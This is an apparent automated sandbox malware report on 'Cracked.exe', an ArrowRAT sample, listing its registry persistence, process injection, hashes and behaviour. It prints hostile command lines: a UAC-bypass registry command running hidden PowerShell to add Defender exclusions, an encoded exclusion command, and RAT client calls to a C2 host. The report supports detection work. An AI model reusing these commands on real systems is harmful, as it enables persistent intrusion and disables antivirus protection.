Malware Analysis Report

2024-10-10 10:15

Sample ID 230729-zfrh7afa48
Target Cracked.exe
SHA256 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb
Tags arrowrat client persistence rat
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

10/10

SHA256

2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb

Threat Level: Known bad

The file Cracked.exe was found to be: Known bad.

Malicious Activity Summary

arrowrat client persistence rat

Modifies WinLogon for persistence

ArrowRat

Modifies Installed Components in the registry

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-29 20:39

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-29 20:39

Reported

2023-07-29 20:42

Platform

win7-20230712-en

Max time kernel

141s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cracked.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Windows\Client.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Client.exe C:\Users\Admin\AppData\Local\Temp\Cracked.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open\command C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open C:\Windows\Client.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" C:\Windows\Client.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Client.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2112 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2940 wrote to memory of 2824 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 2940 wrote to memory of 2824 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 2940 wrote to memory of 2824 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2824 wrote to memory of 2184 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 2184 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 2184 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 564 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 564 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 564 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2940 wrote to memory of 2740 N/A C:\Windows\Client.exe C:\Windows\System32\ComputerDefaults.exe
PID 2940 wrote to memory of 2740 N/A C:\Windows\Client.exe C:\Windows\System32\ComputerDefaults.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Cracked.exe

"C:\Users\Admin\AppData\Local\Temp\Cracked.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="

C:\Windows\Client.exe

"C:\Windows\Client.exe"

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

"C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\System32\ComputerDefaults.exe

"C:\Windows\System32\ComputerDefaults.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

Network

N/A

Files

memory/2112-55-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

memory/2112-54-0x0000000001000000-0x0000000001260000-memory.dmp

memory/2112-56-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

memory/2112-57-0x000000001B420000-0x000000001B4A0000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

memory/2940-63-0x0000000001010000-0x000000000103E000-memory.dmp

memory/2940-65-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

memory/2432-75-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2112-74-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

memory/2432-77-0x000000001B340000-0x000000001B622000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

\Users\Admin\AppData\Local\Temp\nsoB186.tmp\System.dll

MD5 a4dd044bcd94e9b3370ccf095b31f896
SHA1 17c78201323ab2095bc53184aa8267c9187d5173
SHA256 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA512 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

\Users\Admin\AppData\Local\Temp\nsoB186.tmp\nsDialogs.dll

MD5 0d45588070cf728359055f776af16ec4
SHA1 c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256 067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512 751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

memory/2432-94-0x0000000002460000-0x0000000002468000-memory.dmp

memory/2432-95-0x000007FEF2690000-0x000007FEF302D000-memory.dmp

memory/2432-96-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2432-98-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2432-97-0x000007FEF2690000-0x000007FEF302D000-memory.dmp

memory/2432-99-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2432-100-0x000007FEF2690000-0x000007FEF302D000-memory.dmp

memory/2740-102-0x0000000002250000-0x0000000002251000-memory.dmp

memory/2940-103-0x0000000000400000-0x0000000000480000-memory.dmp

memory/2824-104-0x0000000003BE0000-0x0000000003BE1000-memory.dmp

memory/2940-105-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

memory/2740-106-0x0000000002250000-0x0000000002251000-memory.dmp

memory/2940-107-0x0000000000400000-0x0000000000480000-memory.dmp

memory/2824-108-0x0000000003BE0000-0x0000000003BE1000-memory.dmp

memory/2824-112-0x0000000002670000-0x0000000002680000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-29 20:39

Reported

2023-07-29 20:42

Platform

win10v2004-20230703-en

Max time kernel

144s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cracked.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Windows\Client.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Cracked.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation C:\Windows\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4924 set thread context of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Client.exe C:\Users\Admin\AppData\Local\Temp\Cracked.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
